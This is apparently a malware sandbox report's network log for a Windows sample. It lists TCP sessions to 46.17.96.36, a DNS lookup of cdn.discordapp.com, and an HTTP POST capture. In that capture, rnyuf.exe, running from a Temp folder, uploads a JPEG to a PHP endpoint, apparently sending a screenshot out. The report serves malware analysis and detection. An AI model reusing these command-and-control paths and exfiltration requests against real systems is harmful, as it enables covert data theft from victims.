                                        Aug 29, 2021 22:29:06.264111996 CEST805004946.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.264137030 CEST805004946.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.264159918 CEST805004946.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.264401913 CEST805004946.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.301801920 CEST805004946.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.301911116 CEST5004980192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.358978033 CEST5004980192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.359206915 CEST5004880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.360188961 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.394443035 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.394479990 CEST805004946.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.394500971 CEST805004846.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.394610882 CEST5004980192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.394613981 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.394620895 CEST5004880192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.410758018 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.443159103 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.491009951 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.491103888 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.668040037 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.668134928 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.668294907 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.668415070 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.672755003 CEST5005180192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.700756073 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.700793982 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.700824976 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.700851917 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.700874090 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.700898886 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.700921059 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.700967073 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.701040030 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.701117992 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.701190948 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.708205938 CEST805005146.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.708353996 CEST5005180192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.709253073 CEST5005180192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.733850956 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.733889103 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.733916044 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.733938932 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.733956099 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.733958006 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.734024048 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.734132051 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.734158039 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.734181881 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.734199047 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.734206915 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.734251022 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.734275103 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.734292984 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.734308958 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.744518995 CEST805005146.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.769176006 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.769207954 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.769233942 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.769257069 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.769274950 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.769282103 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.769294977 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.769309044 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.769315004 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.769323111 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.769329071 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.769342899 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.769342899 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.769361019 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.769382000 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.769659996 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.769814968 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.769836903 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.769855976 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.786432981 CEST805005146.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.786557913 CEST5005180192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.804702997 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.804743052 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.804765940 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.804785967 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.804804087 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.804847002 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.852529049 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.852619886 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.958684921 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.958985090 CEST5005180192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.961128950 CEST5005280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.991779089 CEST805005046.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.991863966 CEST5005080192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.994386911 CEST805005246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.994435072 CEST805005146.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:06.994519949 CEST5005280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:06.994637966 CEST5005180192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.041423082 CEST5005280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.073868036 CEST805005246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.126326084 CEST805005246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.126432896 CEST5005280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.199781895 CEST5005280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.200822115 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.232783079 CEST805005246.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.232899904 CEST5005280192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.239226103 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.239366055 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.256577969 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.256655931 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.256782055 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.256865978 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.274595976 CEST5005480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.293590069 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.293647051 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.293684006 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.293718100 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.293745041 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.293768883 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.293808937 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.293874025 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.293886900 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.293903112 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.293983936 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.294059992 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.294169903 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.294204950 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.294235945 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.294264078 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.307676077 CEST805005446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.307770014 CEST5005480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.329973936 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.330014944 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.330116987 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.330178022 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.330492020 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.330569983 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.330707073 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.330735922 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.330759048 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.330773115 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.330784082 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.330801964 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.330811024 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.330828905 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.330852985 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.330864906 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.331012964 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.331038952 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.331084967 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.331105947 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.331190109 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.331264019 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.333308935 CEST5005480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.365722895 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.365763903 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.365789890 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.365813017 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.365889072 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.365900993 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.365931034 CEST805005446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.365935087 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.365952015 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.365964890 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.366286993 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.366313934 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.366338015 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.366344929 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.366379023 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.366403103 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.366439104 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.366626978 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.366806984 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.367084026 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.367106915 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.367177010 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.367321968 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.367522001 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.367551088 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.367575884 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.367710114 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.401628971 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.401655912 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.401667118 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.401680946 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.401767015 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.401782036 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.401921988 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.404371977 CEST805005446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.404532909 CEST5005480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.441014051 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.441134930 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.593219995 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.593468904 CEST5005480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.594551086 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.626368046 CEST805005446.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.626472950 CEST5005480192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.628540039 CEST805005346.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.628664970 CEST5005380192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.629452944 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.629540920 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.641004086 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.676227093 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.722687960 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.722800970 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.944303036 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.944365025 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.944545031 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.944617033 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.979626894 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.979675055 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.979698896 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.979722977 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.979747057 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.979790926 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.979835987 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.979963064 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.980022907 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:07.980093002 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:07.980145931 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.015098095 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.015187025 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.015213013 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.015233994 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.015238047 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.015271902 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.015321016 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.015393019 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.015429020 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.015450954 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.015471935 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.015477896 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.015678883 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.015703917 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.015767097 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.015799046 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.050515890 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.050575972 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.050596952 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.050704956 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.050729990 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.050918102 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.051098108 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.051311016 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.051337957 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.051359892 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.051590919 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.051752090 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.051779985 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.051944971 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.052122116 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.064892054 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.064974070 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.064991951 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.086781979 CEST5005680192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.100136995 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.100357056 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.100387096 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.100411892 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.100920916 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.100950003 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.121668100 CEST805005646.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.121757030 CEST5005680192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.129369020 CEST5005680192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.136305094 CEST805005546.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.136404991 CEST5005580192.168.2.446.17.96.36
                                        Aug 29, 2021 22:29:08.164129972 CEST805005646.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.229768038 CEST805005646.17.96.36192.168.2.4
                                        Aug 29, 2021 22:29:08.229883909 CEST5005680192.168.2.446.17.96.36

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Aug 29, 2021 22:26:59.056830883 CEST5453153192.168.2.48.8.8.8
                                        Aug 29, 2021 22:26:59.136215925 CEST53545318.8.8.8192.168.2.4
                                        Aug 29, 2021 22:27:09.054622889 CEST4971453192.168.2.48.8.8.8
                                        Aug 29, 2021 22:27:09.088057041 CEST53497148.8.8.8192.168.2.4
                                        Aug 29, 2021 22:27:30.502619028 CEST5802853192.168.2.48.8.8.8
                                        Aug 29, 2021 22:27:30.544591904 CEST53580288.8.8.8192.168.2.4
                                        Aug 29, 2021 22:27:52.159596920 CEST5309753192.168.2.48.8.8.8
                                        Aug 29, 2021 22:27:52.197352886 CEST53530978.8.8.8192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        Aug 29, 2021 22:27:09.054622889 CEST192.168.2.48.8.8.80x5db3Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        Aug 29, 2021 22:27:09.088057041 CEST8.8.8.8192.168.2.40x5db3No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
                                        Aug 29, 2021 22:27:09.088057041 CEST8.8.8.8192.168.2.40x5db3No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
                                        Aug 29, 2021 22:27:09.088057041 CEST8.8.8.8192.168.2.40x5db3No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
                                        Aug 29, 2021 22:27:09.088057041 CEST8.8.8.8192.168.2.40x5db3No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
                                        Aug 29, 2021 22:27:09.088057041 CEST8.8.8.8192.168.2.40x5db3No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • 46.17.96.36
                                        • cdn.discordapp.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.44973446.17.96.3680C:\Users\user\AppData\Local\Temp\4c423bc94e\rnyuf.exe
                                        TimestampkBytes transferredDirectionData
                                        Aug 29, 2021 22:27:08.907227039 CEST950OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                                        Content-Type: multipart/form-data; boundary=----6f2b8ec125833bffe61c308b0401688c
                                        Host: 46.17.96.36
                                        Content-Length: 107127
                                        Cache-Control: no-cache
                                        Aug 29, 2021 22:27:08.907447100 CEST951OUTData Raw: 2d 2d 2d 2d 2d 2d 36 66 32 62 38 65 63 31 32 35 38 33 33 62 66 66 65 36 31 63 33 30 38 62 30 34 30 31 36 38 38 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                        Data Ascii: ------6f2b8ec125833bffe61c308b0401688cContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                        Aug 29, 2021 22:27:08.907607079 CEST961OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                        Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                        Aug 29, 2021 22:27:08.907707930 CEST963OUTData Raw: 28 a0 06 e3 14 94 fa 31 45 82 e3 29 71 ed 4e 2b 48 45 2b 0e e3 68 22 97 14 51 60 b8 dc 50 69 71 45 03 1b 8e 69 71 4b 45 20 b8 da 4c 53 b1 46 28 b0 c6 e2 8c 53 b1 49 4a c1 71 39 a3 9a 31 46 28 18 94 52 d1 cd 20 1a 68 c5 2d 14 0c 6d 14 ea 28 01 a6
                                        Data Ascii: (1E)qN+HE+h"Q`PiqEiqKE LSF(SIJq91F(R h-m(R(RJZ((,QN4X.%-sNBJ\QLJ)h4wSZu_*>*:0}7{S:r^#(psQ3\zyjf-N~ck
                                        Aug 29, 2021 22:27:08.940452099 CEST969OUTData Raw: 14 4e 49 3f af e4 6b c5 3e 37 7f c9 47 97 fe bd 62 fe 55 ef 1a 0f 87 5f 4e b9 9b 52 d4 6e 7e d9 aa dc 0c 49 36 30 a8 bf dd 51 d8 7f 9e 2b c1 fe 36 ff 00 c9 47 9b fe bd a2 fe 55 cd cd 1e 68 c2 2e e9 2d ce 95 19 72 ca 72 56 6d ec 79 cd 2d 1c d1 cd
                                        Data Ascii: NI?k>7GbU_NRn~I60Q+6GUh.-rrVmy-j@QE{G`i.tt{>`o;g8k<)rQXTnA*A\so&?!l9+J')^?G*+?j:S7?tj?f
                                        Aug 29, 2021 22:27:08.940483093 CEST974OUTData Raw: ba 35 bf 88 de d6 e3 7c 45 70 f3 c4 b7 53 79 90 27 f7 5b 23 71 5f e2 0b 81 d3 0d 24 13 e8 cb e3 9f 08 c7 71 a7 6a 32 5f 79 1a 58 13 47 7c 89 10 3b 23 c6 63 30 93 c7 71 bf 9f 6a f3 61 0c 7e 94 a2 14 03 00 70 69 c6 8c 93 bd fa df f3 ff 00 30 9d 65
                                        Data Ascii: 5|EpSy'[#q_$qj2_yXG|;#c0qja~pi0e+hwxv+u0\?U?]Lo.<N|Wr6D$?m9A8q/A=*VVbMobiGFb)|lJ(EQ!EPIKI@QQbQ@
                                        Aug 29, 2021 22:27:08.940597057 CEST984OUTData Raw: 9f 7e e3 de bd 0a cb c6 cc be 2f 6b 7b b9 91 b4 bb f4 47 b3 90 0c 04 c8 c0 cf e3 90 73 d0 8a f3 6f f8 47 35 cf fa 02 ea 3f f8 0a ff 00 e1 52 1d 0b c4 0d 02 42 da 3e a2 51 09 2a 0d ab f1 9e bd bd 85 7a f5 f0 f8 7a ce ed ad ad fd 7a 1e 3d 0c 46 22
                                        Data Ascii: ~/k{GsoG5?RB>Q*zzz=F"O{^U#ZxbATd0RGc_>)vz("<KNkKqvFvaqRiAQH((ZJ`R1@QE(((RE-((v)
                                        Aug 29, 2021 22:27:08.940609932 CEST986OUTData Raw: f4 b5 ad fd 75 3d b2 d3 5b b7 d7 e1 f0 fd f4 18 05 af 19 64 8f 39 28 e2 de 6c 8f f3 da bc 5b e3 3f fc 94 39 bf eb da 2f e5 5d 27 80 ee 58 f8 d6 ce 18 8b 25 b4 92 49 27 95 9c 80 44 52 01 f9 06 23 35 cd fc 65 ff 00 92 87 37 fd 7b c5 ff 00 a0 d7 95
                                        Data Ascii: u=[d9(l[?9/]'X%I'DR#5e7{ZP[[gBs{GRKE%;oij}p&kN^.MH/<[B"<c/ci7qZ[S,*{{{KO^gr.ry/(A}+!76
